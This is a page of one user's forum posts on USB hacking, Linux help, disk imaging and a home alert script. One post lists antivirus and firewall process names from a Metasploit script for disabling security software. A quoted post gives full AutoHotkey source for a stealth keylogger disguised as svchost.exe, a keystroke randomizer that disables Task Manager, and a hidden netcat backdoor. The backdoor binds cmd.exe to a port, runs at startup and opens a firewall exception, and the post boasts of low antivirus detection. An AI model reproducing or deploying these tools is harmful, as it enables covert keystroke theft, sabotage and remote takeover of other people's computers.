-
Posts
270 -
Joined
-
Last visited
Posts posted by X3N
-
-
Posting u3 dev enviroment. ver .01b
-
MEtasploit comes with a ruby script to disable av which works the same as the old way but had a nice good list of process names of av.
_avp32.exe
_avpcc.exe
_avpm.exe
ackwin32.exe
adaware.exe
advxdwin.exe
agentsvr.exe
agentw.exe
alertsvc.exe
alevir.exe
alogserv.exe
amon9x.exe
anti-trojan.exe
antivirus.exe
ants.exe
apimonitor.exe
aplica32.exe
apvxdwin.exe
arr.exe
atcon.exe
atguard.exe
atro55en.exe
atupdater.exe
atwatch.exe
au.exe
aupdate.exe
auto-protect.nav80try.exe
autodown.exe
autotrace.exe
autoupdate.exe
avconsol.exe
ave32.exe
avgcc32.exe
avgctrl.exe
avgnt.exe
avguard.exe
avkserv.exe
avnt.exe
avp.exe
avp.exe
avp32.exe
avpcc.exe
avpdos32.exe
avpm.exe
avptc32.exe
avpupd.exe
avsched32.exe
avwin.exe
avwin95.exe
avwupd32.exe
blackd.exe
blackice.exe
cfiadmin.exe
cfiaudit.exe
cfinet.exe
cfinet32.exe
claw95.exe
claw95cf.exe
cleaner.exe
cleaner3.exe
defwatch.exe
dvp95.exe
dvp95_0.exe
ecengine.exe
esafe.exe
espwatch.exe
f-agnt95.exe
f-prot.exe
f-prot95.exe
f-stopw.exe
findviru.exe
fp-win.exe
fprot.exe
frw.exe
iamapp.exe
iamserv.exe
ibmasn.exe
ibmavsp.exe
icload95.exe
icloadnt.exe
icmon.exe
icsupp95.exe
icsuppnt.exe
iface.exe
iomon98.exe
jedi.exe
lockdown2000.exe
lookout.exe
luall.exe
moolive.exe
mpftray.exe
n32scanw.exe
navapw32.exe
navlu32.exe
navnt.exe
navw32.exe
navwnt.exe
nisum.exe
nmain.exe
normist.exe
nupgrade.exe
nvc95.exe
outpost.exe
padmin.exe
pavcl.exe
pavsched.exe
pavw.exe
pccwin98.exe
pcfwallicon.exe
persfw.exe
rav7.exe
rav7win.exe
rescue.exe
safeweb.exe
scan32.exe
scan95.exe
scanpm.exe
scrscan.exe
serv95.exe
smc.exe
sphinx.exe
sweep95.exe
tbscan.exe
tca.exe
tds2-98.exe
tds2-nt.exe
vet95.exe
vettray.exe
vscan40.exe
vsecomr.exe
vshwin32.exe
vsstat.exe
webscanx.exe
wfindv32.exe
zonealarm.exe
avgserv.exe
avgserv9.exe
avguard.exe
avgw.exe
avkpop.exe
avkserv.exe
avkservice.exe
avkwctl9.exe
avltmain.exe
avnt.exe
avp.exe
avp32.exe
avpcc.exe
avpdos32.exe
avpm.exe
avptc32.exe
avpupd.exe
avpupd.exe
avsched32.exe
avsynmgr.exe
avwinnt.exe
avwupd.exe
avwupd32.exe
avwupd32.exe
avwupsrv.exe
avxmonitor9x.exe
avxmonitornt.exe
avxquar.exe
avxquar.exe
backweb.exe
bargains.exe
bd_professional.exe
beagle.exe
belt.exe
bidef.exe
bidserver.exe
bipcp.exe
bipcpevalsetup.exe
bisp.exe
blackd.exe
blackice.exe
blss.exe
bootconf.exe
bootwarn.exe
borg2.exe
bpc.exe
brasil.exe
bs120.exe
bundle.exe
bvt.exe
ccapp.exe
ccevtmgr.exe
ccpxysvc.exe
cdp.exe
cfd.exe
cfgwiz.exe
cfiadmin.exe
cfiaudit.exe
cfiaudit.exe
cfinet.exe
cfinet32.exe
claw95cf.exe
clean.exe
cleaner.exe
cleaner3.exe
cleanpc.exe
click.exe
cmd.exe
cmd32.exe
cmesys.exe
cmgrdian.exe
cmon016.exe
connectionmonitor.exe
cpd.exe
cpf9x206.exe
cpfnt206.exe
ctrl.exe
cv.exe
cwnb181.exe
cwntdwmo.exe
datemanager.exe
dcomx.exe
defalert.exe
defscangui.exe
defwatch.exe
deputy.exe
divx.exe
dllcache.exe
dllreg.exe
doors.exe
dpf.exe
dpfsetup.exe
dpps2.exe
drwatson.exe
drweb32.exe
drwebupw.exe
dssagent.exe
dvp95.exe
dvp95_0.exe
ecengine.exe
efpeadm.exe
emsw.exe
ent.exe
esafe.exe
escanhnt.exe
escanv95.exe
espwatch.exe
ethereal.exe
etrustcipe.exe
evpn.exe
exantivirus-cnet.exe
exe.avxw.exe
expert.exe
explore.exe
fameh32.exe
fast.exe
fch32.exe
fih32.exe
findviru.exe
firewall.exe
fnrb32.exe
fprot.exe
f-prot.exe
f-prot95.exe
fp-win.exe
fp-win_trial.exe
frw.exe
fsaa.exe
fsav.exe
fsav32.exe
fsav530stbyb.exe
fsav530wtbyb.exe
fsav95.exe
fsgk32.exe
fsm32.exe
fsma32.exe
fsmb32.exe
f-stopw.exe
gator.exe
gbmenu.exe
gbpoll.exe
generics.exe
gmt.exe
guard.exe
guarddog.exe
hacktracersetup.exe
hbinst.exe
hbsrv.exe
hotactio.exe
hotpatch.exe
htlog.exe
htpatch.exe
hwpe.exe
hxdl.exe
hxiul.exe
iamapp.exe
iamserv.exe
iamstats.exe
ibmasn.exe
ibmavsp.exe
icloadnt.exe
icmon.exe
icsupp95.exe
icsuppnt.exe
idle.exe
iedll.exe
iedriver.exe
iexplorer.exe
iface.exe
ifw2000.exe
inetlnfo.exe
infus.exe
infwin.exe
init.exe
intdel.exe
intren.exe
iomon98.exe
istsvc.exe
jammer.exe
jdbgmrg.exe
jedi.exe
kavlite40eng.exe
kavpers40eng.exe
kavpf.exe
kazza.exe
keenvalue.exe
kerio-pf-213-en-win.exe
kerio-wrl-421-en-win.exe
kerio-wrp-421-en-win.exe
kernel32.exe
killprocesssetup161.exe
launcher.exe
ldnetmon.exe
ldpro.exe
ldpromenu.exe
ldscan.exe
lnetinfo.exe
loader.exe
localnet.exe
lockdown.exe
lockdown2000.exe
lookout.exe
lordpe.exe
lsetup.exe
luall.exe
luall.exe
luau.exe
lucomserver.exe
luinit.exe
luspt.exe
mapisvc32.exe
mcagent.exe
mcmnhdlr.exe
mcshield.exe
mctool.exe
mcupdate.exe
mcupdate.exe
mcvsrte.exe
mcvsshld.exe
md.exe
mfin32.exe
mfw2en.exe
mfweng3.02d30.exe
mgavrtcl.exe
mgavrte.exe
mghtml.exe
mgui.exe
minilog.exe
mmod.exe
monitor.exe
moolive.exe
mostat.exe
mpfagent.exe
mpfservice.exe
mpftray.exe
mrflux.exe
msapp.exe
msbb.exe
msblast.exe
mscache.exe
msccn32.exe
mscman.exe
msconfig.exe
msdm.exe
msdos.exe
msiexec16.exe
msinfo32.exe
mslaugh.exe
msmgt.exe
msmsgri32.exe
mssmmc32.exe
mssys.exe
msvxd.exe
mu0311ad.exe
mwatch.exe
n32scanw.exe
nav.exe
navap.navapsvc.exe
navapsvc.exe
navapw32.exe
navdx.exe
navlu32.exe
navnt.exe
navstub.exe
navw32.exe
navwnt.exe
nc2000.exe
ncinst4.exe
ndd32.exe
neomonitor.exe
neowatchlog.exe
netarmor.exe
netd32.exe
netinfo.exe
netmon.exe
netscanpro.exe
netspyhunter-1.2.exe
netstat.exe
netutils.exe
nisserv.exe
nisum.exe
nmain.exe
nod32.exe
normist.exe
norton_internet_secu_3.0_407.exe
notstart.exe
npf40_tw_98_nt_me_2k.exe
npfmessenger.exe
nprotect.exe
npscheck.exe
npssvc.exe
nsched32.exe
nssys32.exe
nstask32.exe
nsupdate.exe
nt.exe
ntrtscan.exe
ntvdm.exe
ntxconfig.exe
nui.exe
nupgrade.exe
nupgrade.exe
nvarch16.exe
nvc95.exe
nvsvc32.exe
nwinst4.exe
nwservice.exe
nwtool16.exe
ollydbg.exe
onsrvr.exe
optimize.exe
ostronet.exe
otfix.exe
outpost.exe
outpost.exe
outpostinstall.exe
outpostproinstall.exe
padmin.exe
panixk.exe
patch.exe
pavcl.exe
pavproxy.exe
pavsched.exe
pavw.exe
pcfwallicon.exe
pcip10117_0.exe
pcscan.exe
pdsetup.exe
periscope.exe
persfw.exe
perswf.exe
pf2.exe
pfwadmin.exe
pgmonitr.exe
pingscan.exe
platin.exe
pop3trap.exe
poproxy.exe
popscan.exe
portdetective.exe
portmonitor.exe
powerscan.exe
ppinupdt.exe
pptbc.exe
ppvstop.exe
prizesurfer.exe
prmt.exe
prmvr.exe
procdump.exe
processmonitor.exe
procexplorerv1.0.exe
programauditor.exe
proport.exe
protectx.exe
pspf.exe
purge.exe
qconsole.exe
qserver.exe
rapapp.exe
rav7.exe
rav7win.exe
rav8win32eng.exe
ray.exe
rb32.exe
rcsync.exe
realmon.exe
reged.exe
regedit.exe
regedt32.exe
rescue.exe
rescue32.exe
rrguard.exe
rshell.exe
rtvscan.exe
rtvscn95.exe
rulaunch.exe
run32dll.exe
rundll.exe
rundll16.exe
ruxdll32.exe
safeweb.exe
sahagent.exe
save.exe
savenow.exe
sbserv.exe
sc.exe
scam32.exe
scan32.exe
scan95.exe
scanpm.exe
scrscan.exe
setup_flowprotector_us.exe
setupvameeval.exe
sfc.exe
sgssfw32.exe
sh.exe
shellspyinstall.exe
shn.exe
showbehind.exe
smc.exe
sms.exe
smss32.exe
soap.exe
sofi.exe
sperm.exe
spf.exe
sphinx.exe
spoler.exe
spoolcv.exe
spoolsv32.exe
spyxx.exe
srexe.exe
srng.exe
ss3edit.exe
ssg_4104.exe
ssgrate.exe
st2.exe
start.exe
stcloader.exe
supftrl.exe
support.exe
supporter5.exe
svc.exe
svchostc.exe
svchosts.exe
svshost.exe
sweep95.exe
sweepnet.sweepsrv.sys.swnetsup.exe
symproxysvc.exe
symtray.exe
sysedit.exe
system.exe
system32.exe
sysupd.exe
taskmg.exe
taskmgr.exe
taskmo.exe
taskmon.exe
taumon.exe
tbscan.exe
tc.exe
tca.exe
tcm.exe
tds2-nt.exe
tds-3.exe
teekids.exe
tfak.exe
tfak5.exe
tgbob.exe
titanin.exe
titaninxp.exe
tracert.exe
trickler.exe
trjscan.exe
trjsetup.exe
trojantrap3.exe
tsadbot.exe
tvmd.exe
tvtmd.exe
undoboot.exe
updat.exe
update.exe
update.exe
upgrad.exe
utpost.exe
vbcmserv.exe
vbcons.exe
vbust.exe
vbwin9x.exe
vbwinntw.exe
vcsetup.exe
vet32.exe
vet95.exe
vettray.exe
vfsetup.exe
vir-help.exe
virusmdpersonalfirewall.exe
vnlan300.exe
vnpc3000.exe
vpc32.exe
vpc42.exe
vpfw30s.exe
vptray.exe
vscan40.exe
vscenu6.02d30.exe
vsched.exe
vsecomr.exe
vshwin32.exe
vsisetup.exe
vsmain.exe
vsmon.exe
vsstat.exe
vswin9xe.exe
vswinntse.exe
vswinperse.exe
w32dsm89.exe
w9x.exe
watchdog.exe
webdav.exe
webscanx.exe
webtrap.exe
wfindv32.exe
whoswatchingme.exe
wimmun32.exe
win32.exe
win32us.exe
winactive.exe
win-bugsfix.exe
window.exe
windows.exe
wininetd.exe
wininit.exe
wininitx.exe
winlogin.exe
winmain.exe
winnet.exe
winppr32.exe
winrecon.exe
winservn.exe
winssk32.exe
winstart.exe
winstart001.exe
wintsk32.exe
winupdate.exe
wkufind.exe
wnad.exe
wnt.exe
wradmin.exe
wrctrl.exe
wsbgate.exe
wupdater.exe
wupdt.exe
wyvernworksfirewall.exe
xpf202en.exe
zapro.exe
zapsetup3001.exe
zatutor.exe
zonalm2601.exe
zonealarm.exe
-
Yes you can!!
I have done so with my U3 drive.
It has backtrack 3 bootable, where as If I plug it into a computer(thats capable of booting from USB) and turn on the computer, and select boot from USB on the boot menu (after pressing the right key usually F12) it will boot up backtrack 3 instead of the host OS.
Also if I plug my device into any Windows XP machine my custom ISO will autorun my app. (it doesn't work on vista though)
So yes its possible to make your drive bootable, and still have your U3 autorun intact for windows machines...
With backtrack 3 its simple to set the drive up to boot, follow the instructions. Just make sure you change the MBR of your USB drive not anything else!!
what version of U3 drive did you use ? i been looking into preserving the u3 functionality and booting...
ive already make a backtrack bootable usbdrive before but it wasnt u3.... did you use the same process?
-
kool looking at the page there is a lot of frameworks. what would you recommend for first timer with python? any really good tuts you recommend?
it really depends on what you are developing for... if i was developing an app for windows id just use the native windows api but if i wanted something cross platform i might use gtk honestly i dont use gui's hardly at all in my programming... i prefer the cli
As far as tutorials i always find it easiest to pick apart the examples that the dev kits usually come with in order to figure it out.
-
there alot of options for this...
in the open source area you have clonezilla which is a clone of ghost
theres also dd which is my fave...
none opensource stuff that ive used is ghost which works well.
also acronis true image
really though the best is dd if you learn how to use that because it does a bit for bit exact copy... alot of these other programs compress the freespace which speeds up the process and makes the image smaller but if you want an exact copy then you should use dd. Ive had unpredictable things happen with the mbr when using tools other then dd. Plus dd works over netcat nicely in case you wanted to do it over the network.
-
I'm not exactly sure where you got the tar package from, but I was able to find pre-compiled versions of the RTL8187SE wifi module for Ubuntu. Assuming that this is the module that corresponds to your wifi card, the easist way to get your wireless working would be to download the .deb package.
I found it here and according to the author's website the latest version of the package is this one.
There is a longer list of other packages, including for 8.04 here.
I'm pretty sure that it should install with
dpkg --install name-of-package.deb
If it tells you that there are unmet dependencies, try
apt-get install name-of-whatever-it-complains-about name-of-something-else
Hope that helps.
Also, should mention, I've never used it, but I believe that Linux Mint is basically Ubuntu made easy (which was supposed to be Debain made easy). You might want to try that.
mint linux is just as easy as regular ubuntu but mint is prettier.
-
-
for a production environment you should use actual hardware. Have one input going into your computer and the multiple inputs going into a receiver or a switch that you change depending on what you want to show.
-
hi,
i was just wondering if there was some sort of scripting language for linux simmiler to autoIT (www.autoitscript.com).
using autoIT you can create a nice and simple GUI for a script instead of the CLI interface. is there a program similer.
also im kinda new to the scripting side of linux
python
-
theres two choices now the first is to use the universal customizer and the other is using lpinstaller.... here is the link for using the lpinstaller on a vista machine simaler to what you were takling about i actually wrote a tool in autoIT to make it easier
-
Did you really feel the need to quote the WHOLE source?
why not?
-
WARNING VERY LONG POST!
For sometime now, i've been coding stuff in c, in fact i wrote versions of keyl and keyr in c, then i found ahk while trying to find a way to install my cmdo payload in a single .exe, turns out ahk has been used on this forum before, but i forgot about it until a few days ago. AHK is an awesome scripting lang that takes all the hard work out of keyboard hooks! So i re-wrote the apps, and here is the ahk source code, so everyone can learn how fun and easy this scripting lang is. Post bugs if you find them, and have fun! Feel free to hack/mod/use this code anyway you want (works nicely with usb payloads). :)
None of these programs are illegal. Morality and legality lie in the application of knowledge, not in the information itself.
PM/IRC/AIM me with questions.
PROGRAMS AND FEATURES1. Keyr
-Randomizes Keys on the keyboard
-Adds itself to startup (regkey)
-Works on WinXP / Vista
-Disables Task Mgr (regkey)
-Press WinKey + X to quit
-Only about 10% of AntiVirus found it (VirusTotal)
MD5...: de40e57473c719d84da9b1a9e2527a86
2. Keyl
-Your basic keylogger, saves keystrokes to C:\WINDOWS\keyl.txt
-Adds itself to startup (RegKey)
-Completely Stealthed
-Looks like svchost while running
-Works on XP / Vista
-Press WinKey + X to quit
-Only about 5% of AntiVirus found it (VirusTotal)
MD5...: ebb7ab566064661707956a64be7f01b3
3. Cmdo
-Updated Cmdo Payload
-Installs a Netcat backdoor (reverse shell)
-Single .exe Install File
-Adds itself to startup (regkey)
-Completely Stealthed
-In XP adds itself to the firewall exceptions list, and hides itself from the GUI
-Easy to use Auto Connect Script
-Downside is nc.exe has 68% detection rate (VirusTotal)
MD5...: 260f8f4566635734a8c663358752c108
AHK SOURCE CODESo basically for all of them, there is the actual .exe's (contain the payload), and the install file, the install file only needs to be run once, and it adds regkeys/makes dirs/sets attribs/etc, i commented the code best i could
>Keyr
keyr_install.exe
;Install Keyr.exe into root of C: ;Keyr Script has to be compiled first! #NoTrayIcon FileInstall, .\keyr.exe, C:\keyr.exe ;add to startup RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,keyr,C:\keyr.exe ;disable task mgr RegWrite REG_DWORD,HKEY_CURRENT_USER,software\microsoft\windows\currentversion\policies\system,DisableTaskMgr,1 FileSetAttrib, +SH, C:\keyr.exe Run C:\keyr.exe ExitApp
keyr.exe
;KeyStroke Randomizer ;keyr.exe v1.0 ;By SableFoXx #NoEnv #NoTrayIcon #InstallKeybdHook #x:: MsgBox, Exit Function Invoked ExitApp ;---------------- ; ALPHA KEYS ;---------------- ; The $ stops recusrion $a::GetAlpha() $b::GetAlpha() $c::GetAlpha() $d::GetAlpha() $e::GetAlpha() $f::GetAlpha() $g::GetAlpha() $h::GetAlpha() $i::GetAlpha() $j::GetAlpha() $k::GetAlpha() $l::GetAlpha() $m::GetAlpha() $n::GetAlpha() $o::GetAlpha() $p::GetAlpha() $q::GetAlpha() $r::GetAlpha() $s::GetAlpha() $t::GetAlpha() $u::GetAlpha() $v::GetAlpha() $w::GetAlpha() ;$x::GetAlpha() - Only if you're evil $y::GetAlpha() $z::GetAlpha() ; Don't Forget CAPS! $+a::GetAlpha() $+b::GetAlpha() $+c::GetAlpha() $+d::GetAlpha() $+e::GetAlpha() $+f::GetAlpha() $+g::GetAlpha() $+h::GetAlpha() $+i::GetAlpha() $+j::GetAlpha() $+k::GetAlpha() $+l::GetAlpha() $+m::GetAlpha() $+n::GetAlpha() $+o::GetAlpha() $+p::GetAlpha() $+q::GetAlpha() $+r::GetAlpha() $+s::GetAlpha() $+t::GetAlpha() $+u::GetAlpha() $+v::GetAlpha() $+w::GetAlpha() $+x::GetAlpha() $+y::GetAlpha() $+z::GetAlpha() CapsLock::MsgBox, WARNING: This Button Does Nothing! ;---------------- ; NUM KEYS ;---------------- $0::GetNum() $1::GetNum() $2::GetNum() $3::GetNum() $4::GetNum() $5::GetNum() $6::GetNum() $7::GetNum() $8::GetNum() $9::GetNum() $Numpad0::GetNum() $Numpad1::GetNum() $Numpad2::GetNum() $Numpad3::GetNum() $Numpad4::GetNum() $Numpad5::GetNum() $Numpad6::GetNum() $Numpad7::GetNum() $Numpad8::GetNum() $Numpad9::GetNum() ;Fun-Sions GetNum(){ Random, num, 0, 10 if(num = 10) Shutdown, 4 else SendInput, %num% } GetAlpha(){ ; I wish i could so a switch() Random, alpha, 1, 26 If(alpha = 1) SendInput, a If(alpha = 2) SendInput, b If(alpha = 3) SendInput, c If(alpha = 4) SendInput, d If(alpha = 5) SendInput, e If(alpha = 6) SendInput, f If(alpha = 7) SendInput, g If(alpha = 8) SendInput, h If(alpha = 9) SendInput, i If(alpha = 10) SendInput, j If(alpha = 11) SendInput, k If(alpha = 12) SendInput, l If(alpha = 13) SendInput, m If(alpha = 14) SendInput, n If(alpha = 15) SendInput, o If(alpha = 16) SendInput, p If(alpha = 17) SendInput, q If(alpha = 18) SendInput, r If(alpha = 19) SendInput, s If(alpha = 20) SendInput, t If(alpha = 21) SendInput, u If(alpha = 22) SendInput, v If(alpha = 23) SendInput, w If(alpha = 24) SendInput, x If(alpha = 25) SendInput, y If(alpha = 26) SendInput, z } ; -=d0tmayhem=-
>keyl
keyl_install.exe
;Install Svchost.exe into the root C:\ ;Keyl Script has to be compiled first, ;and renamed to svchost, after being compiled ;============================================== #NoTrayIcon ;Remove old one IfNotExist, C:\svchost.exe, goto install SendInput, #x Sleep, 1000 FileSetAttrib, -SH, C:\svchost.exe install: FileInstall, .\svhost.exe, C:\svhost.exe, 1 RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\svchost.exe FileSetAttrib, +SH, C:\svchost.exe Run, C:\svchost.exe ExitApp
keyl.exe
;======================= ; Keylogger (keyl.exe) ; By SableFoXx ; v1.1 ;======================= #NoEnv #NoTrayIcon #InstallKeybdHook #SingleInstance, Force SetWorkingDir %SystemRoot% FileAppend, `n[%A_MM%/%A_DD%/%A_YYYY% %A_hour%:%A_min%], C:\WINDOWS\keyl.txt Spc := " " #x:: ;WinKey + X to stop program MsgBox, 0, -=d0tmayhem=-, Keyl has been stopped, 10 ExitApp ;---------------- ; ALPHA KEYS ;---------------- $a::AlphaKey("a", "A") $b::AlphaKey("b", "B") $c::AlphaKey("c", "C") $d::AlphaKey("d", "D") $e::AlphaKey("e", "E") $f::AlphaKey("f", "F") $g::AlphaKey("g", "G") $h::AlphaKey("h", "H") $i::AlphaKey("i", "I") $j::AlphaKey("j", "J") $k::AlphaKey("k", "K") $l::AlphaKey("l", "L") $m::AlphaKey("m", "M") $n::AlphaKey("n", "N") $o::AlphaKey("o", "O") $p::AlphaKey("p", "P") $q::AlphaKey("q", "Q") $r::AlphaKey("r", "R") $s::AlphaKey("s", "S") $t::AlphaKey("t", "T") $u::AlphaKey("u", "U") $v::AlphaKey("v", "V") $w::AlphaKey("w", "W") $x::AlphaKey("x", "X") $y::AlphaKey("y", "Y") $z::AlphaKey("z", "Z") ;**Caps Keys** $+a::TransKey("+a", "A") $+b::TransKey("+b", "B") $+c::TransKey("+c", "C") $+d::TransKey("+d", "D") $+e::TransKey("+e", "E") $+f::TransKey("+f", "F") $+g::TransKey("+g", "G") $+h::TransKey("+h", "H") $+i::TransKey("+i", "I") $+j::TransKey("+j", "J") $+k::TransKey("+k", "K") $+l::TransKey("+l", "L") $+m::TransKey("+m", "M") $+n::TransKey("+n", "N") $+o::TransKey("+o", "O") $+p::TransKey("+p", "P") $+q::TransKey("+q", "Q") $+r::TransKey("+r", "R") $+s::TransKey("+s", "S") $+t::TransKey("+t", "T") $+u::TransKey("+u", "U") $+v::TransKey("+v", "V") $+w::TransKey("+w", "W") $+x::TransKey("+x", "X") $+y::TransKey("+y", "Y") $+z::TransKey("+z", "Z") ;---------------- ; NUM KEYS ;---------------- $0::GenKey("0") $1::GenKey("1") $2::GenKey("2") $3::GenKey("3") $4::GenKey("4") $5::GenKey("5") $6::GenKey("6") $7::GenKey("7") $8::GenKey("8") $9::GenKey("9") ;**Numpad Keys** $Numpad0::GenKey("0") $Numpad1::GenKey("1") $Numpad2::GenKey("2") $Numpad3::GenKey("3") $Numpad4::GenKey("4") $Numpad5::GenKey("5") $Numpad6::GenKey("6") $Numpad7::GenKey("7") $Numpad8::GenKey("8") $Numpad9::GenKey("9") ;**NumPad Symbls** $NumpadDot::GenKey(".") $NumpadDiv::GenKey("/") $NumpadSub::GenKey("-") $NumpadMult::GenKey("*") $NumpadAdd::ModfKey("+") $NumpadDel::ModfKey("Del") $NumpadEnd::ModfKey("End") $NumpadHome::ModfKey("Home") $NumpadPgUp::ModfKey("PgUp") $NumpadPgDn::ModfKey("PgDn") $NumpadIns::ModfKey("Insert") $NumpadEnter::ModfKey("Enter") ;---------------- ; FUNC KEYS ;---------------- $F1::ModfKey("F1") $F2::ModfKey("F2") $F3::ModfKey("F3") $F4::ModfKey("F4") $F5::ModfKey("F5") $F6::ModfKey("F6") $F7::ModfKey("F7") $F8::ModfKey("F8") $F9::ModfKey("F9") $F10::ModfKey("F10") $F11::ModfKey("F11") $F12::ModfKey("F12") ;---------------- ; SYBL KEYS ;---------------- $+0::TransKey("+0", ")") $+3::TransKey("+3", "#") $+4::TransKey("+4", "$") $+5::TransKey("+5", "%") $+6::TransKey("+6", "^") $+7::TransKey("+7", "&") $+8::TransKey("+8", "*") $+9::TransKey("+9", "(") $-::GenKey("-") $=::GenKey("=") $[::GenKey("[") $]::GenKey("]") $;::GenKey(";") $'::GenKey("'") $,::GenKey(",") $.::GenKey(".") $/::GenKey("/") $\::GenKey("\") $+-::GenKey("_") $+`::GenKey("~") $+;::GenKey(":") $+,::GenKey("<") $+.::GenKey(">") $+/::GenKey("?") $+\::GenKey("|") $+[::ModfKey("{") $+]::ModfKey("}") $+=::ModfKey("+") $`::TransKey("``", "``") ;---------------- ; SPCL KEYS ;---------------- ;These are used by ahotkey ;and need SendRaw to work $+1:: SendRaw, ! FileAppend, !, C:\WINDOWS\keyl.txt Return $+2:: SendRaw, @ FileAppend, @, C:\WINDOWS\keyl.txt Return $+':: SendRaw, " FileAppend, ", C:\WINDOWS\keyl.txt Return ;---------------- ; MODF KEYS ;---------------- $!::ModfKey("Alt") $^::ModfKey("Ctrl") $Tab::ModfKey("Tab") $End::ModfKey("End") $Home::ModfKey("Home") $PgUp::ModfKey("PgUp") $PgDn::ModfKey("PgDn") $Enter::ModfKey("Enter") $Pause::ModfKey("Pause") $+Pause::ModfKey("Break") $Insert::ModfKey("Insert") $Delete::ModfKey("Delete") $Backspace::ModfKey("Backspace") $PrintScreen::ModfKey("PrintScreen") $CapsLock::CapsLock() $Space:: SendInput, {Space} FileAppend, %Spc%, C:\WINDOWS\keyl.txt Return ;======================================================== ; FUNCTIONS ;======================================================== ;GenKey - Generic Key, takes one argument (the keystroke), appends same value to log ;Alpahkey - Takes the lower(akey)/upper(ukey) case alpha value and returns a lower, or upper ; depending on the state in which CapsLock is set ;TransKey - Translate Key, takes two arguments, the first is the raw keystroke (skey) and ; the secound is the alrdy translated key you want appended to the log file (xkey) ;ModfKey - Modifer Key, these are your ALT, WIN, and TAB keys, the arg should be the string you ; want passed to SendInput, Modf key strokes are marked with "[" and "]" in the log file ;CapsLock - First finds what state the CapsLock is in, then toggles it and appends the log ; file with either [CAPS-ON] or [CAPS-OFF] GenKey(gkey){ SendInput, %gkey% FileAppend, %gkey%, C:\WINDOWS\keyl.txt } AlphaKey(akey, ukey){ state := GetKeyState("Capslock", "T") if(state == "0"){ SendInput, %akey% FileAppend, %akey%, C:\WINDOWS\keyl.txt }else{ SendInput, %ukey% FileAppend, %ukey%, C:\WINDOWS\keyl.txt } } TransKey(skey, xkey){ SendInput, %skey% FileAppend, %xkey%, C:\WINDOWS\keyl.txt } ModfKey(mkey){ SendInput, {%mkey%} FileAppend, [%mkey%], C:\WINDOWS\keyl.txt } CapsLock(){ state := GetKeyState("Capslock", "T") if(state == "1"){ SetCapsLockState, Off FileAppend, [CAPS-OFF], C:\WINDOWS\keyl.txt }else{ SetCapsLockState, On FileAppend, [CAPS-ON], C:\WINDOWS\keyl.txt } } ; -=d0tmayhem=-
>Cmdo [Download .exes]
cmdo_install.exe
;Setup Cmdo Payload ;By SableFoXx #NoEnv #NoTrayIcon FileCreateDir, C:\cmdo FileSetAttrib, +SH, C:\cmdo FileInstall, .\cmdo.exe, C:\cmdo\cmdo.exe FileInstall, .\hidec.exe, C:\cmdo\hidec.exe FileInstall, .\nc.exe, C:\cmdo\nc.exe FileSetAttrib, +SH, C:\cmdo\cmdo.exe FileSetAttrib, +SH, C:\cmdo\hidec.exe FileSetAttrib, +SH, C:\cmdo\nc.exe ;Startup Key XP / VISTA RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\cmdo\cmdo.exe IfExist C:\WINDOWS\system32\wuapp.exe goto done xp: ;XP Firewall Key RegWrite REG_SZ,HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,C:\cmdo\nc.exe,C:\cmdo\nc.exe:*:Enabled:@xpsp2res.dll,-22019 goto done done: Run, C:\cmdo\cmdo.exe ExitApp
cmdo.exe
;Cmdo.exe ;by SableFoXx ;Runs NC #NoEnv #NoTrayIcon #SingleInstance, Force Run, C:\cmdo\hidec.exe nc.exe -l -t -p 69 -d -e cmd.exe ExitApp
Information is FreeDamn that was a long post :)
whats the cpu load for the keylogger?
-
This client of ours wants a simple FTP server with permissions and groups. We started out with an ubuntu server 8.10, but permission settings were beginning to be a hassle.
We hooked them up with the latest version of FreeNAS, but we're just having too many problems with permissions on the SFTP... I'm about 2 days away from saying %#@$ it and making them buy windows server 2003 to just vpn over and use network shared resources.
I looked for a good guide on how to configure file permissions for groups of people, but i'm having a really hard time getting chmod/chown to work on a specific user/folder.
Does anyone know of an sftp / smb server program that lets the admin configure user permissions on certain folders? Or of a site that does a good job explaining how to use permissions on linux?
read the freenas manual
-
I don't think there's a good tech way to solve this problem. It seems like the problem would solve itself the first time they're busy with something, call you, walk away, and come back to see you hadn't done anything waiting on them.
I mean, if they're calling you for help, can't you just tell them to wait for you to get there or to make sure their screen isn't locked when you arrive?
actually there is a good way to fix all this. Like I had mentioned before logon scripts and using the GPO editor to manipulate group policy's.
then use Ultra vnc to remote control if need be....
even if you installed ssh you could run scripts to fix whatever is wrong with thier setup.
-
psexec you need admin privelegest to run over the network...
pstools is a set of tools that do a bunch of really cool stuff... has nothing to do with script kiddies
-
The people in my house can be trusted and wouldn't know where the heck to start with hacking me. I guess I could understand your concern with security. The problem with using an instant messenger program is that the user might not always be by his/ her computer but would be in the same room. Yeah, i suppose an intercom might be an idea but that's really not an option. Ill just try to figure it out on my own. I think you have given me a good start especially with the psexec tool. I might just give this idea up and try something else. Unless you know how to use sockets in VB.NET 2008 to create a messenger program...
Thanks for all of your help,
Micah C
first download autoIT then paste this into a txt file called beepstart.au3
$cmd = "psexec \\testmachine -u DOMAIN\USER -p PASSWORD -c beep.exe" Run($cmd)
make sure to change the machine and password part to match your machine.
Then in another file called beep.au3 paste this
Beep()
Compile the beep.au3 to an exe
now all you have to do is double click the beep.au3 or you can compile it to an exe as well. either way you could just make a shortcut for whoeveer to click on in order to make your computer beep.
-
The batch script simply creates a beeping sound. Try it out. All i wanted to do is allow one user to click a button on a vb.net form which would execute this script on my computer or vise versa alerting me that a user needs assistance. Does that make sense? ill try to re - explain if it doesn't. Any ideas? remember the users are not computer savvy so something with a GUI interface would be helpful. Thanks for your help so far. I know im a noob @ this sort of thing. Am i just making this harder than it needs to be?
soudns like your better off using an instant messenger program... and if your in the same house you might as well use an intercom....
the problem i dont like with what your trying to do is that you really dont want people having access to your computer like that... remote command execution via a button sounds pretty insecure to me.
-
The reason I would like to use vb.net 2008 1. because I know that language best 2. is because the users that will be using this program are not very computer savvy. I was hoping to have a nice GUI so that there is no confusion between the other users. The main goal of this program is to create a beeper so that a family member in one room can simply "beep" me indicating that that user needs assistance. Originally i tried using sockets in VB. I am not very experienced with this so i gave that idea up and moved on to something like we have here.
Any ideas?,
Micah C
what exactly are you trying to do here? what was that script supposed to do?
-
